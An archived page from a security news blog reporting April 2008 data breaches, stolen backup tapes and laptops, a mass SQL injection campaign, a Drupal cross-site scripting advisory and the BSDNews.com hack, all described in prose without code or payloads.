CyberInsecure.com

Archive for April, 2008

The theft of a laptop computer owned by an accounting firm has made nearly 500 employees of Coos County and private organizations concerned about identity theft. County officials worry the data may have contained employees’ names, Social Security numbers and other personal information, which had been used in recent audits performed by Hough, MacAdam & Wartnik LLC of North Bend.

According to a Coos Bay Police press log, at approximately 7:28 a.m. on March 5, officers received a report of a woman flagging down Officer Tony Wetmore, identified as 122 in the log, near Coos Bay City Hall. Crystal Albiar, 30, told Wetmore a laptop computer had been stolen from a vehicle, which, Wetmore said, belonged to Albiar. The victim is listed on the press log as Hough, MacAdam & Wartnik. Albiar is a senior accountant at the firm.

Later that day, a letter from the company was sent to clients stating that a serious data security incident may have involved clients’ personal information.

So far there have been no known reports of identity theft from any of the 482 employees notified. The computer has not been found and, according to a letter from the firm, thieves sometimes hold victims’ information for later use.

The CPA said the computer was password protected, as were certain files. Some of the information contained in the programs require “special knowledge in order to find the personal information inside of the program”.

SwimwearBoutique.com recently reported illegally gained unauthorized access to customers personal information stored in SwimwearBoutique.com (SWB) online account. This unlawful access occurred between March 26, 2008 and March 28, 2008. The information accessed varied and included customers name, address, email address, SWB account password, and credit card account number of approximately 37 residents of New Hampshire, who were SWB customers. These criminals also corrupted data maintained by SWB, rendering certain data unreadable and unusable.

This crime was reported to the Dallas office of the United States Secret Service, which are assisting with the investigation. SWB also worked with its existing Internet security provider, McAfee, to determine how these criminals gained access to this information and immediately implemented measures to counter such unlawful conduct.

Notification letters were sent out on April 23, 2008 and affected customers can call for more information 1-866-SWIMWEAR.

Spammers, in their recent tactics, have targeted Google’s well-known blog publishing system “Blogger”/”Blogspot”, following the previous attacks on Microsoft’s Live Mail Anti-CAPTCHA, Google’s Gmail Anti-CAPTCHA and Microsoft’s Live Hotmail Anti-CAPTCHA services.

The automated bots are capable of not only signing up and creating Blogger accounts (using spammer account credentials), but also use these accounts as redirectors and doorway pages for advertising their products and services. In the current attack, accounts using anti-CAPTCHA operations at Blogger get registered, and few lines of script or code is used to refresh the account, thus directing the user to the actual spam domain.

For spammers, there could be few main advantages to this approach. A free to sign up where accounts can be used as redirectors or doorway pages to spammers’ domain(s). Spammers include these redirecting accounts in different spam campaigns rather than including their actual spam domains and use this tactic to defeat a range of anti-spam services.
These redirecting or doorway page accounts can also be used in multiple mass-mailing campaigns for subsequent attacks.
Another advantage is the difficulty to keep track of these accounts as millions of users worldwide are using Google’s Blogger services on a regular basis.

The entire automated process in is built of two stages. First, predefined instructions from the CAPTCHA breaking host injected on to bot infected or victim’s machine. Instructions are used as templates, with varying account credentials and spam domain redirecting script. Second, bot infected or victims’ machine performing tasks are per pre-defined instructions. Spammers are trying to improve the Anti-CAPTCHA techniques and performed validation checks are sent to their email addresses.

These accounts could be used by the spammers at any time for a variety of social-engineering attacks, a trend that has been increasingly common with various popular Web 2.0 sites.

A private off-site storage company used by the University of Miami has notified the University that a container carrying computer back-up tapes of patient information was stolen.  The tapes were in a transport case that was stolen from a vehicle contracted by the storage company on March 17 in downtown Coral Gables, the company reported.
The victims are more than 2 million medical patients that visited university medical facilities since January 1st, 1999. Types of lost data include names, addresses, Social Security numbers, health information, credit card and other financial information.

Jacqueline Menendez, vice president of communications at the university, said a vehicle used by Archive America Ltd. to transport the patient data was broken into in downtown Coral Gables, Fla., on March 17. The university posted an alert about the incident on April 17, a full month after the backup tapes were stolen. Archive America waited 48 hours before finally notifying the university on Mar. 19 about the break-in and theft.

In a statement, Doctor Pascal J. Goldschmidt, senior vice president for medical affairs and dean of the University of Miami Miller School of Medicine, said, “Even though I am confident that our patients’ data is safe, we felt that in the best interest of the physician-patient relationship we should be transparent in this matter.”

Since the incident, Mendendez said that the university temporarily stopped transporting backup data off-site. “At this point, we’re not transporting anything until we conduct our own internal evaluation of the incident and see if there’s anything that could have been done differently or better”.

Coral Gables law enforcement officials, who are investigating the incident, have informed the school that it was likely a “random theft”. Law enforcement is investigating the incident as one of a series of petty thefts in the area.

UM says it will notify 47,000 patients by mail whose records may have included credit card or other financial information.

After learning about the data breach, the university contacted local computer forensics companies to see if data on a similar set of backup tapes could be accessed.

The University has established a call center at 1-866-628-4492 for questions and help.

The mass infection that’s injecting attack code into hundreds of thousands of reputable web pages has infiltrated the website of the Department of Homeland Security.

This latest attack is notable for its ability to infect huge numbers of pages using only a single string of text. At time of writing, Google searches showed almost 560,000 pages containing the infection string, though the exact number changes almost constantly. As the screenshot below shows, even the Department of Homeland Security, which is responsible for protecting US infrastructure against cyber attacks, wasn’t immune. Other hacked sites include those belonging to the United Nations and the UK Civil Service.

The attack causes infected sites to redirect visitors to destinations that attempt to install malware on vulnerable machines. At time of writing, the malicious payloads attacked vulnerabilities that already have been patched. And in any case all three of the redirection sites were down, possibly because they were unable to handle the demand. But should the attackers get their hands on a newer exploit - say, one targeting a zero-day vulnerability in QuickTime - it would be relatively easy for them to swap out the payload.

One reason the infection has spread so widely is the attackers have managed to find a single attack string that seems to work on tens of thousands of different sites. The script is also notable for its ability to slip past web application defenses. The SQL query is mostly made up of HEX code, allowing it to obscure itself, at least to apps that use Microsoft SQL. MySQL and PostgreSQL are less easily fooled, according to researcher Ronald van den Heetkamp.

Sites are getting hacked because they fail to sanitize user supplied data. So far Department of Homeland Security has not commented on this issue.

Do not visit the infected websites addresses presented in this article or Google search results.

Personal details of thousands of customers of Boots Dental Plan (including Boots UK Limited and Medisure) have been stolen after a courier car was broken into in Bristol. The high street chemist chain has today admitted losing 27,000 customer records and 7,000 employees details. The information included bank account details, as well as names and addresses. The officials claimed it was “highly unlikely” these could be accessed.

Boots and Medisure, who administer the plan for the company, said all customers had been informed. Boots said in a statement: “We would like to reassure our Boots Dental Plan customers that because of the type of data tape that was stolen and the way the information was stored it is highly unlikely that any personal data could be accessed or misused.”

The tapes were taken from the car of a subcontracted data security company in Bristol on 3 April, 2008. The data is described as “technically complicated” and only accessible with specialist IT equipment and software. Boots declined to name the courier company.

Medisure added the information was not stored on standard software or CDs and could not be used on any home-style PC or laptop. Medisure did not say whether the data was encrypted.

“Reviewing this incident closely with the Police, they consider this to be an opportunist theft rather than a planned operation,” Medisure said in the letter. Avon and Somerset Police said they were investigating the theft from a car on St Thomas Street.

A new type of attack that could give a hacker access to an Oracle database, called a lateral SQL injection, could be used to gain database administrator privileges on an Oracle server in order to change or delete data or even install software.

Security researcher David Litchfield first disclosed this type of attack at the Black Hat Washington conference last February, but on last Thursday he published a paper with technical details. Litchfield’s attack targets the Procedural Language/SQL programming language used by Oracle developers.

In a SQL injection, attackers create specially crafted search terms that trick the database into running SQL commands. Previously, security experts thought that SQL injections would work only if the attacker was inputting character strings into the database, but Litchfield has shown that the attack can work using new types of data, known as date and number data types.

Litchfield wasn’t sure how widespread lateral SQL injection vulnerabilities are, but he thinks the attack could cause real damage in some scenarios. “If you happen to be using Oracle and you write your own applications on it, then yes, you could be writing vulnerable code,” he said. “The sky is not falling … but it’s certainly something that people should be made aware of.”

Database programmers should review their code to be sure it is checking to make sure that all of the data it is processing is legitimate, and not injected SQL commands.

Oracle did not comment on this issue.

Southern Connecticut State University is notifying 11,000 current and former students that their Social Security numbers may have been compromised two weeks after discovering that its website had been used by hackers to spam fancy wedding rings.

The personal data was in a file on the university’s web server, which was accessed by criminals who were using the university’s site as part of a spam operation. The hackers were using university server as a hosting for their own websites.

Pages on the university’s site contained ads for diamond rings, Viagra and Cialis. After noticing the ads on April 9, IT staff discovered the file containing the sensitive information. During security review after the hacker incident, this file there and it wasn’t properly secured, so it could have been targeted by someone. The file contained names, addresses and Social Security numbers of students who had registered to graduate from the school, dating back to 2002.

The university believes that the hackers came from outside the U.S., and it is working with the Connecticut attorney general’s office to investigate.

Students affected by the breach are being offered identity protection services for two years.

The university’s attack does not appear to be connected with recent widespread SQL injection attacks. In those hacks, attackers had been using the websites to attack other computers and infect them with malware. With Southern Connecticut, the motive appears to have been tied to spam.

The application is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied input. The Internationalization module is also prone to cross-site request forgery attacks while performing node translations.

An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can exploit the cross-site request-forgery issue by tricking a victim into following a specially crafted HTTP request designed to perform some action on the attacker’s behalf using a victim’s currently active session. To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI.

The vendor has released updates.

Vulnerable:

Drupal Localizer 5.x 3.3
Drupal Localizer 5.x 2.x-dev
Drupal Localizer 5.x 1.10
Drupal Internationalization 6.x 1.x-dev
Drupal Internationalization 5.x 2.2
Drupal Internationalization 5.x 1.x-dev

Not Vulnerable:

Drupal Localizer 5.x 3.4
Drupal Localizer 5.x 2.1
Drupal Localizer 5.x 1.11
Drupal Internationalization 6.x 1.0-beta1
Drupal Internationalization 5.x 2.3
Drupal Internationalization 5.x 1.1

The BSDNews.com web site have been compromised through an exploit of a file named “bottom.php3″, which was used by the site. The attacker was able to access and download user account information.

The following message, made by the attacker, appeared in the forum:

Hi all, maybe some of you, saw that bsdnews.com is/was offline.
I hacked their database, with an exploit found by myself.
I tried to submit to milw0rm, but they dont accept exploits of .php3 .
bottom.php3 , this file was vulnerability.
LOL, ok.. But i have their user database.
I dont want to waste my time to check the hole thing..
first word is username, second word is password, third word is email adress. B
By some lines the password,email is NULL.
Do what you want to do with it..
Please, if u think i didnt hacked it, search forums/google , you dont find anything
THIS IS MY FIRST RELEASE HERE!
i kept everything as i got it so there can be info what is usefull
uploaded at my host